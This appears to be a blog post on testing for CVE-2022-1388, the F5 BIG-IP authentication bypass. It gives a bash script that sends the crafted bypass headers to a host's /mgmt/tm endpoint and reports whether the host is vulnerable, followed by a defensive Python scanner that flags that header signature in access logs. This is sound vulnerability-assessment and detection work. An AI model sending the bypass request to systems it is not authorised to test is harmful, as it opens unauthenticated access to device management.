Testing for F5 Networks BIG-IP vulnerability (CVE-2022-1388)

Background

CVE-2022-1388 is a critical vulnerability (CVSS 9.8) in the management interface of F5 Networks’ BIG-IP solution that enables an unauthenticated attacker to gain remote code execution on the system by bypassing F5’s iControl REST authentication. The vulnerability was disclosed publicly on 4 May 2022.

Testing

A bash script to test for CVE-2022-1388 was published at https://www.randori.com/blog/vulnerability-analysis-cve-2022-1388/. I modified the sample script to accept a target IP or FQDN as a command line argument, as follows:

#!/bin/bash
# cve-2022-1388-test.sh -- CVE-2022-1388 test script
# 2022-05-11
# Usage: ./cve-2022-1388-test.sh <ip-or-fqdn>

HOST=$1

if [ -z "$HOST" ]; then
	printf 'usage: %s <ip-or-fqdn>\n' "$0" >&2
	exit 1
fi

# An unpatched device answers the iControl REST query with a JSON "items" list
# even though no valid credentials are supplied. --insecure is needed because
# management interfaces usually present a self-signed certificate.
if curl -s "https://$HOST/mgmt/tm" --insecure \
	-H "Authorization: Basic YWRtaW46" \
	-H "X-F5-Auth-Token: 1" \
	-H "Connection: X-Forwarded-Host, X-F5-Auth-Token" \
	-H "Content-Length: 0" |
	grep -q '"items":\['; then
	printf '\n[*] %s is vulnerable\n' "$HOST"
else
	printf "\n[*] %s doesn't appear vulnerable\n" "$HOST"
fi

Example usage:

❯ ./cve-2022-1388-test.sh 10.0.0.39
[*] 10.0.0.39 doesn't appear vulnerable

❯ ./cve-2022-1388-test.sh 10.0.0.40
[*] 10.0.0.40 is vulnerable
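On the defender's side, the same request signature the script sends is what you would look for in the management interface's access logs. The following Python scanner is an added example (not from the original post or from F5) that flags the two indicators of the check above, a Connection header that lists X-F5-Auth-Token and a Basic credential with an empty password on the /mgmt/ path; the log records are constructed in a made-up "METHOD PATH | Header: value | ..." layout, so parse_line must be adapted to your own log fields.

```python
import base64
# Constructed sample records, one request per line, in a made-up "METHOD PATH | Header: value | ..." layout.
SAMPLE_LOG = """\
GET /mgmt/tm | Authorization: Basic YWRtaW46 | X-F5-Auth-Token: 1 | Connection: X-Forwarded-Host, X-F5-Auth-Token
GET /mgmt/tm | Authorization: Basic YWRtaW46cGFzc3dvcmQ= | Connection: keep-alive
GET /index.html | Connection: keep-alive
GET /mgmt/tm | Authorization: Basic YWRtaW46 | Connection: close
"""

def parse_line(line):
    """Split one constructed record into (path, {lower-cased header name: value})."""
    request, *raw_headers = [part.strip() for part in line.split("|")]
    path = request.split(" ", 1)[1]
    headers = {}
    for raw in raw_headers:
        name, _, value = raw.partition(":")
        headers[name.strip().lower()] = value.strip()
    return path, headers

def basic_auth_has_empty_password(value):
    """True if an HTTP Basic credential decodes to 'user:' with an empty password."""
    scheme, _, blob = value.partition(" ")
    if scheme.lower() != "basic":
        return False
    try:
        decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except ValueError:  # malformed base64 (binascii.Error is a ValueError subclass)
        return False
    user, sep, password = decoded.partition(":")
    return bool(sep) and user != "" and password == ""

def check_request(path, headers):
    """Return the CVE-2022-1388 indicators seen in one request (empty list if none)."""
    findings = []
    # Connection normally carries keep-alive/close; naming X-F5-Auth-Token there is the distinctive mark.
    tokens = {t.strip().lower() for t in headers.get("connection", "").split(",")}
    if "x-f5-auth-token" in tokens:
        findings.append("Connection header lists X-F5-Auth-Token")
    if path.startswith("/mgmt/") and basic_auth_has_empty_password(headers.get("authorization", "")):
        findings.append("empty-password Basic credential on /mgmt/")
    return findings

def scan_log(text):
    """Return [(line_number, findings)] for every request that trips at least one indicator."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        if line.strip() and (findings := check_request(*parse_line(line))):
            hits.append((number, findings))
    return hits
```

A hit on either indicator means someone ran this check, or the bypass it is derived from, against the device, whether or not the device was patched, so it is worth alerting on regardless of the script's verdict.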